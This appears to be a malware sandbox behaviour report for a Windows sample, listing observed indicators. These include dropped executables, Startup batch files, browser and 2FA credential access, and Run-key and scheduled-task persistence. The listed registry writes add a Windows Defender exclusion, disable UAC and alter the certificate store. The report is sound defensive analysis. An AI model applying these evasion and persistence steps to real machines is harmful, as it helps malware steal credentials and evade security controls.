File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\p8uyealHzzpGxkNZBshQURQy.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pP0mcv6Xs53QZ5WjBMnksL2b.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\L6UP1Ru7w3PQ5rUvEgHAwfh4.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3AVUwQy69w11wYuaPFHpqcJg.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9KClTgTBpIPLuCUmmDaWqTwY.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NfRxw9VEj155Jga22TVujLzJ.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mrB9EGWYMuTYg7agNBntg5Gc.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IxJb32UDCOuwgMOD0SE8XJRL.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M9DcS9PsxdVLrwPmZF28C8BJ.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1bAcsxjCQK2HDgBsEXDcsx2J.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dkoEkZasLDHT0gOqmVW5uFQX.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\J04COPVV1zbADLibHvv63L37.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fVuNa7gdQo6H7rvYJCD4lQpU.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\zlwXiUU8CKJFMILgAs1ACet7.exe N/A
N/A N/A C:\Users\Admin\Pictures\fa311yJ4gzHSWLJUhnKRiwP0.exe N/A
N/A N/A C:\Users\Admin\Pictures\4NBpuPydcM1CgkfkosSLJGBz.exe N/A
N/A N/A C:\Users\Admin\Pictures\f2aWE99yFgIVRBiiaEPY6g1L.exe N/A
N/A N/A C:\Users\Admin\Pictures\3XzaYMVbaZBj1IxsOKsToZGL.exe N/A
N/A N/A C:\Users\Admin\Pictures\M7ml9FpyMLAeZLArPdUlqOKs.exe N/A
N/A N/A C:\Users\Admin\Pictures\wTh7MiWkEaApgk3zkFBNItRS.exe N/A
N/A N/A C:\Users\Admin\Pictures\iAR3NEjxEx9jqAJE43HxlJxh.exe N/A
N/A N/A C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe N/A
N/A N/A C:\Users\Admin\Pictures\o1KVbEn6m6gtxs3IlOKKQ5Er.exe N/A
N/A N/A C:\Users\Admin\Pictures\tPBVrOz9nznq7EI1j7HnHSNW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-PL13U.tmp\f2aWE99yFgIVRBiiaEPY6g1L.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe N/A
N/A N/A C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\ErUlK6xejTvgF1mGobsQGIri.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-6IF8E.tmp\_isetup\_setup64.tmp N/A
N/A N/A C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe N/A
N/A N/A C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-NLG3O.tmp\8758677____.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseService.exe N/A
N/A N/A C:\Program Files\Windows Defender Advanced Threat Protection\WGNGCLTPEK\lightcleaner.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\07-19e1b-f63-ad5bc-9c3e8653caf7d\Kizhigobaely.exe N/A
N/A N/A C:\Windows\System32\Conhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050341191\assistant\Assistant_100.0.4815.21_Setup.exe_sfx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050341191\assistant\assistant_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050341191\assistant\assistant_installer.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe = "0" C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe N/A

Accesses 2FA software files, possible credential harvesting

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1384669652-2270756765-572751751-1000\Software\Microsoft\Windows\CurrentVersion\Run\DigitalPulse = "\"C:\\Users\\Admin\\AppData\\Roaming\\DigitalPulse\\DigitalPulseService.exe\" 5333:::clickId=:::srcId=" C:\Windows\system32\backgroundTaskHost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Media Player\\Haezhaequhija.exe\"" C:\Users\Admin\AppData\Local\Temp\is-NLG3O.tmp\8758677____.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\D: C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe N/A
File opened (read-only) \??\D: C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe N/A

Legitimate hosting services abused for malware hosting/C2

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Windows Media Player\Haezhaequhija.exe.config C:\Users\Admin\AppData\Local\Temp\is-NLG3O.tmp\8758677____.exe N/A
File created C:\Program Files\Windows Defender Advanced Threat Protection\WGNGCLTPEK\lightcleaner.exe.config C:\Users\Admin\AppData\Local\Temp\is-NLG3O.tmp\8758677____.exe N/A
File created C:\Program Files (x86)\LightCleaner\unins000.dat C:\Windows\System32\Conhost.exe N/A
File created C:\Program Files (x86)\LightCleaner\is-E9KOO.tmp C:\Windows\System32\Conhost.exe N/A
File created C:\Program Files\Windows Defender Advanced Threat Protection\WGNGCLTPEK\lightcleaner.exe C:\Users\Admin\AppData\Local\Temp\is-NLG3O.tmp\8758677____.exe N/A
File opened for modification C:\Program Files (x86)\LightCleaner\LightCleaner.exe C:\Windows\System32\Conhost.exe N/A
File opened for modification C:\Program Files (x86)\LightCleaner\VTRegScan.dll C:\Windows\System32\Conhost.exe N/A
File created C:\Program Files (x86)\LightCleaner\is-AU268.tmp C:\Windows\System32\Conhost.exe N/A
File created C:\Program Files (x86)\LightCleaner\is-LM2RS.tmp C:\Windows\System32\Conhost.exe N/A
File created C:\Program Files (x86)\Windows Media Player\Haezhaequhija.exe C:\Users\Admin\AppData\Local\Temp\is-NLG3O.tmp\8758677____.exe N/A
File created C:\Program Files (x86)\LightCleaner\is-I0UF4.tmp C:\Windows\System32\Conhost.exe N/A
File opened for modification C:\Program Files (x86)\LightCleaner\unins000.dat C:\Windows\System32\Conhost.exe N/A
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\Pictures\4NBpuPydcM1CgkfkosSLJGBz.exe N/A
File opened for modification C:\Program Files (x86)\LightCleaner\CircularProgressBar.dll C:\Windows\System32\Conhost.exe N/A
File created C:\Program Files (x86)\LightCleaner\is-G0198.tmp C:\Windows\System32\Conhost.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status C:\Windows\SYSTEM32\schtasks.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet C:\Windows\syswow64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\syswow64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status C:\Windows\syswow64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier C:\Windows\SYSTEM32\schtasks.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\SYSTEM32\schtasks.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Status C:\Windows\SYSTEM32\schtasks.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 C:\Windows\syswow64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Windows\syswow64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor C:\Windows\SYSTEM32\schtasks.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision C:\Windows\SYSTEM32\schtasks.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\syswow64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Platform Specific Field 1 C:\Windows\syswow64\rundll32.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 C:\Windows\SYSTEM32\schtasks.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Previous Update Revision C:\Windows\SYSTEM32\schtasks.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Windows\SYSTEM32\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 C:\Windows\syswow64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data C:\Windows\syswow64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\Pictures\wTh7MiWkEaApgk3zkFBNItRS.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet C:\Windows\SYSTEM32\schtasks.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor C:\Windows\syswow64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Status C:\Windows\syswow64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Previous Update Revision C:\Windows\syswow64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data C:\Windows\SYSTEM32\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor C:\Windows\syswow64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data C:\Windows\SYSTEM32\schtasks.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString C:\Windows\SYSTEM32\schtasks.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information C:\Windows\syswow64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\Pictures\wTh7MiWkEaApgk3zkFBNItRS.exe N/A
Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor C:\Windows\SYSTEM32\schtasks.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information C:\Windows\SYSTEM32\schtasks.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet C:\Windows\SYSTEM32\schtasks.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Previous Update Revision C:\Windows\SYSTEM32\schtasks.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\syswow64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\SYSTEM32\schtasks.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SYSTEM32\schtasks.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Windows\SYSTEM32\schtasks.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\SYSTEM32\schtasks.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz C:\Windows\SYSTEM32\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\syswow64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz C:\Windows\syswow64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\syswow64\rundll32.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\SYSTEM32\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 C:\Windows\SYSTEM32\schtasks.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Windows\syswow64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString C:\Windows\syswow64\rundll32.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1384669652-2270756765-572751751-1000_Classes\Local Settings C:\Windows\syswow64\rundll32.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e19962000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7
